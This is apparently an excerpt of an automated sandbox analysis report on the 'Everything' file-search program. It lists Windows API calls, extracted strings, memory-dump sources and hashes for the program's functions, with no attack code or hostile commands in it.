                                                                                                              • Part of subcall function 00007FF63D61B0B0: IsDebuggerPresent.KERNEL32 ref: 00007FF63D61B105
                                                                                                              • Part of subcall function 00007FF63D61B0B0: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF63D61B10F
                                                                                                              • Part of subcall function 00007FF63D61B0B0: UnhandledExceptionFilter.KERNEL32 ref: 00007FF63D61B11A
                                                                                                              • Part of subcall function 00007FF63D61B0B0: GetCurrentProcess.KERNEL32 ref: 00007FF63D61B130
                                                                                                              • Part of subcall function 00007FF63D61B0B0: TerminateProcess.KERNEL32 ref: 00007FF63D61B13E
                                                                                                              • Part of subcall function 00007FF63D61A020: FlsGetValue.KERNEL32(00000000,00000000,000002D8,00007FF63D61B615,?,?,000002D8,00007FF63D61DCB7,?,?,?,?,00000000,00007FF63D61AFBE), ref: 00007FF63D61A040
                                                                                                              • Part of subcall function 00007FF63D61A020: GetModuleHandleA.KERNEL32(00000000,00000000,000002D8,00007FF63D61B615,?,?,000002D8,00007FF63D61DCB7,?,?,?,?,00000000,00007FF63D61AFBE), ref: 00007FF63D61A05B
                                                                                                              • Part of subcall function 00007FF63D61A020: GetModuleHandleA.KERNEL32 ref: 00007FF63D61A082
                                                                                                              • Part of subcall function 00007FF63D61A020: GetProcAddress.KERNEL32 ref: 00007FF63D61A0C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule$Value$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerLibraryLoadPresentTerminate
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                            • API String ID: 3160505718-232180764
                                                                                                            • Opcode ID: aa183df221b22933b7e6911a09263dc3768e1f69ad96fc3cb2cc8f7ac847d694
                                                                                                            • Instruction ID: 762f58cf7020b535e245b86f2331a649cd06308ebf8be807ccb71d56d06a62a7
                                                                                                            • Opcode Fuzzy Hash: aa183df221b22933b7e6911a09263dc3768e1f69ad96fc3cb2cc8f7ac847d694
                                                                                                            • Instruction Fuzzy Hash: 55515B25E0977B45FAA4DBE1A8006B96295AF8BB84F484035DD3EC2792FF3CE545F600
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$ErrorLast$Open$CloseHandle$ControlDeleteManagerMessage
                                                                                                            • String ID: Everything Client
                                                                                                            • API String ID: 1180834274-3147354192
                                                                                                            • Opcode ID: bee598f8365ca3ca97e14aa8c2d9ace575e815c9568f87bc32611eb9e4dd160c
                                                                                                            • Instruction ID: 87625198be98718dffb992a9c0354cc0fb83b10e1900bd3652fc6d0581fa6dca
                                                                                                            • Opcode Fuzzy Hash: bee598f8365ca3ca97e14aa8c2d9ace575e815c9568f87bc32611eb9e4dd160c
                                                                                                            • Instruction Fuzzy Hash: 73315021E0DF5E82FB549F92A8152792361FB4AB88F040036DD6E87755EE3CE058B744
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ESDb$Invalid file code offset %d > %d.$Invalid folder code offset %d > %d.$Loading structure %08x: %d folders, %d files...$convert all folder parent indexes into folder parent folders %f seconds$invalid db magic$invalid file index %u$invalid folder index %u$invalid parent folder index %d >= %d + %d$unsupported db version
                                                                                                            • API String ID: 0-1902030742
                                                                                                            • Opcode ID: 1fa2a57c7cf68b36757dcce6a0f74b01c32c3868fa0aa8d05090b1edce7a99b4
                                                                                                            • Instruction ID: 6532a922f8fb99380ef91707ca34f39d9ce40712fbcdc90baa1aff7dc851dfc4
                                                                                                            • Opcode Fuzzy Hash: 1fa2a57c7cf68b36757dcce6a0f74b01c32c3868fa0aa8d05090b1edce7a99b4
                                                                                                            • Instruction Fuzzy Hash: 7EB2E772B04B8A92DE64CF65E5802BEB3A1FB45BC4F164535CA6E87756EE3DE041D300
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000000,00000000,00000001,00007FF63D61B57C,?,?,?,?,?,?,00007FF63D619741,?,?,00000000), ref: 00007FF63D61B32F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 514040917-4022980321
                                                                                                            • Opcode ID: cdc27e4cdd9eecaed53ac323ebc0b4dd8d4c21060f67068dea3fe0ba801f3825
                                                                                                            • Instruction ID: 67266d01edff31741c8455af91e2c1573bde00150e6fcc26725b42da3e31d599
                                                                                                            • Opcode Fuzzy Hash: cdc27e4cdd9eecaed53ac323ebc0b4dd8d4c21060f67068dea3fe0ba801f3825
                                                                                                            • Instruction Fuzzy Hash: C551C121F1867B42FB11DBE9A4116BA2251AF47760F44423AEE3DC2BC6FE2CE555B300
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3778485334-0
                                                                                                            • Opcode ID: 3d71a3792f4103f3a6ec06fe76b80d9500f1920c922449c537dc0fdcae4f345b
                                                                                                            • Instruction ID: 94c368caf1e414abcdfdde448cd7e58411848f5862fd064378b905f1de0f4e6a
                                                                                                            • Opcode Fuzzy Hash: 3d71a3792f4103f3a6ec06fe76b80d9500f1920c922449c537dc0fdcae4f345b
                                                                                                            • Instruction Fuzzy Hash: 7B31E231D08B6E95E7509B90F84036973A4FB86748F500036DAAD82B66FF3CE058F740
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269745586-0
                                                                                                            • Opcode ID: 041fc135333eef0f16d065e85a915a6a02a20603b92f5fd004cd6a2cadae4782
                                                                                                            • Instruction ID: 6aa67be2d6a660431048a1745f5974ba3085d2458ba6bfa7ff81c8cbd89280c4
                                                                                                            • Opcode Fuzzy Hash: 041fc135333eef0f16d065e85a915a6a02a20603b92f5fd004cd6a2cadae4782
                                                                                                            • Instruction Fuzzy Hash: 5E010421E28E5A82E760DB90F44436A73A4FF9A709F410135D6AE82764FF3CD154EB10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterFrequency
                                                                                                            • String ID: SET SORT 3 %d$SET SORT 4 %d$already sorted$finished sort, time taken %f seconds$set sort %d %d
                                                                                                            • API String ID: 774501991-358240988
                                                                                                            • Opcode ID: fe16a9a48a92500404c531363e72b7518f241a0944c1b19febe8f6a129f1cdea
                                                                                                            • Instruction ID: 0afe16029b9bf9ff86e233eda140b6624254fbdd3e40c93259c2bcc7601f7b74
                                                                                                            • Opcode Fuzzy Hash: fe16a9a48a92500404c531363e72b7518f241a0944c1b19febe8f6a129f1cdea
                                                                                                            • Instruction Fuzzy Hash: 3DF18B72A08A8A8AD720CF65D8806AA77A0FB5479CF414036DF4D97B59EF38E549E700
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: rebuild: guid changed$rebuild: include only changed$rebuild: new refs volume$rebuild: path changed$rebuild: refs index type changed
                                                                                                            • API String ID: 0-2821217063
                                                                                                            • Opcode ID: 196fa083cb2110e757207614d357aa7f474dcfccccdfe420d47903362b78a8f3
                                                                                                            • Instruction ID: e82fc4e03b76873d5605f1ae9b7991381b940b6d700348c77b79004cab559e77
                                                                                                            • Opcode Fuzzy Hash: 196fa083cb2110e757207614d357aa7f474dcfccccdfe420d47903362b78a8f3
                                                                                                            • Instruction Fuzzy Hash: EA51D722A1C6CA82E7319765A0502BA6761FF85384F454032DACDC3797FF1EE955E780
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstPathRoot
                                                                                                            • String ID:
                                                                                                            • API String ID: 2746138353-0
                                                                                                            • Opcode ID: c005a6d99f4e13250f2a096e991d24df8edf5bfefc5fee602987cab2d5d01b31
                                                                                                            • Instruction ID: 15ae3c0ca418e838a6b56efeb91d32035d17f3f951bdb07aedd10f2970896d18
                                                                                                            • Opcode Fuzzy Hash: c005a6d99f4e13250f2a096e991d24df8edf5bfefc5fee602987cab2d5d01b31
                                                                                                            • Instruction Fuzzy Hash: 9E31703260868587EB70CB65F4952AAB3A0FB8C7A4F405235EEAE83784DF3CD554DB40
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstPathRoot
                                                                                                            • String ID:
                                                                                                            • API String ID: 2746138353-0
                                                                                                            • Opcode ID: 024f61dab0b0500076dc12e009eae5265321661d3b39e65c9d37654867cf4c2a
                                                                                                            • Instruction ID: d4063d3be66d9405ef795a98bb9e5f69567639c3d34ea39131743c40cad17130
                                                                                                            • Opcode Fuzzy Hash: 024f61dab0b0500076dc12e009eae5265321661d3b39e65c9d37654867cf4c2a
                                                                                                            • Instruction Fuzzy Hash: 0521843270868587DB74DB65F49527A73A0FB88794F000135EAAE83784EF3CD464DB40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AttributesFile
                                                                                                            • String ID: ,%u,%I64u$.csv$.csv.tmp$Run History
                                                                                                            • API String ID: 689033430-1710194831
                                                                                                            • Opcode ID: 898d2b508b7bbfb2eca96afcc697a25a95d4c74014b3c1a7374c5339de83373c
                                                                                                            • Instruction ID: 19f5002c6618959104b719d7e0b8eaa808853a87c86a2cdc9b46475fb0ae4f97
                                                                                                            • Opcode Fuzzy Hash: 898d2b508b7bbfb2eca96afcc697a25a95d4c74014b3c1a7374c5339de83373c
                                                                                                            • Instruction Fuzzy Hash: DE518332A08A9A81EB61EB51E4403FA7324FF85798F451032DA4C87B5AEF3CE505E740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                                            • String ID: Everything Client
                                                                                                            • API String ID: 3789849863-3147354192
                                                                                                            • Opcode ID: 09a24ed30c01dee1cbd6f9f5210e0a23d154329d4c9df1c8e09edf06e535c427
                                                                                                            • Instruction ID: f314da04bfd56cfa037f678f3e84ba0514fd18ca4aace9b06c3ab6aa88e4ad27
                                                                                                            • Opcode Fuzzy Hash: 09a24ed30c01dee1cbd6f9f5210e0a23d154329d4c9df1c8e09edf06e535c427
                                                                                                            • Instruction Fuzzy Hash: D4D06735A09F8692EB249B50F85109A63A8FB49318F800135D59DC2774FF2CD269EB04
                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF63D499EEB
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF63D499F93
                                                                                                              • Part of subcall function 00007FF63D5489E0: WaitForSingleObject.KERNEL32(?,?,?,00007FF63D480C6E), ref: 00007FF63D5489ED
                                                                                                              • Part of subcall function 00007FF63D5489E0: EnterCriticalSection.KERNEL32(?,?,?,00007FF63D480C6E), ref: 00007FF63D548A03
                                                                                                              • Part of subcall function 00007FF63D53F700: GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
